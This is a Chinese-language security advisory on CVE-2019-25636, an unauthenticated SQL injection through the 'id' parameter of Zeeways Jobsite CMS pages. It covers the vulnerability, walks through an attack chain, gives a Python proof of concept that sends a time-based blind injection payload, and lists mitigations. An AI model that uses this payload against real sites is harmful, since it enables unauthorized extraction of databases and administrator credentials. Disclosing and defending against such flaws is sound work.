CVE-2019-25636 CVSS 8.2 高危

CVE-2019-25636 Zeeways Jobsite CMS SQL注入漏洞

披露日期: 2026-03-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25636

漏洞类型

SQL注入

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Zeeways Jobsite CMS

漏洞概述

Zeeways Jobsite CMS存在SQL注入漏洞，允许未经认证的攻击者通过'id' GET参数操纵数据库查询。攻击者可向news_details.php等页面发送包含GROUP BY和CASE语句的恶意请求，从而提取敏感数据库信息。该漏洞通过网络传播，无需用户交互，对数据机密性构成严重威胁。

技术细节

该漏洞的核心成因是Zeeways Jobsite CMS未能正确验证用户通过GET请求提交的'id'参数，导致应用程序容易受到SQL注入攻击。受影响的端点包括news_details.php、jobs_details.php和job_cmp_details.php。未经身份验证的远程攻击者可以通过网络向这些端点发送精心构造的恶意请求。攻击者利用SQL语法中的GROUP BY和CASE语句执行高级盲注攻击。这种技术允许攻击者通过逻辑判断（如布尔条件或时间延迟）推断数据库内容，从而绕过简单的WAF防护。通过逐位提取数据，攻击者可以获取完整的数据库架构、管理员凭证及敏感业务数据，严重威胁系统机密性。

攻击链分析

STEP 1

侦察

识别目标系统是否运行Zeeways Jobsite CMS，并定位news_details.php等受影响端点。

STEP 2

漏洞探测

向受影响端点发送包含单引号或简单SQL语句的测试Payload，验证'id'参数是否存在注入点。

STEP 3

构造攻击载荷

利用GROUP BY和CASE语句构造盲注Payload，用于逐位提取数据库信息。

STEP 4

数据窃取

发送恶意请求并分析服务器响应，提取数据库结构、管理员凭证等敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target = "http://target-host/news_details.php"

# PoC: SQL Injection via 'id' parameter using GROUP BY and CASE
# This example checks if the first character of the database user is 'r'

payload = "?id=1 UNION ALL SELECT 1,2,3, CASE WHEN SUBSTRING(user(),1,1)='r' THEN sleep(5) ELSE 1 END-- -"

try:
    response = requests.get(target + payload, timeout=10)
    if response.elapsed.total_seconds() >= 5:
        print("[+] Vulnerability Confirmed: SQL Injection in 'id' parameter")
    else:
        print("[-] Response does not indicate vulnerability (or condition false)")
except Exception as e:
    print(f"Error: {e}")

影响范围

Zeeways Jobsite CMS (所有已知版本)

防御指南

临时缓解措施

建议立即升级至修复版本。若无法升级，应在应用网关或WAF层部署规则，拦截针对news_details.php等页面的恶意请求，特别是包含'UNION', 'GROUP BY', 'CASE'等SQL关键字的参数。同时，确保数据库用户仅具备必要的最小权限，防止敏感数据表被读取。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表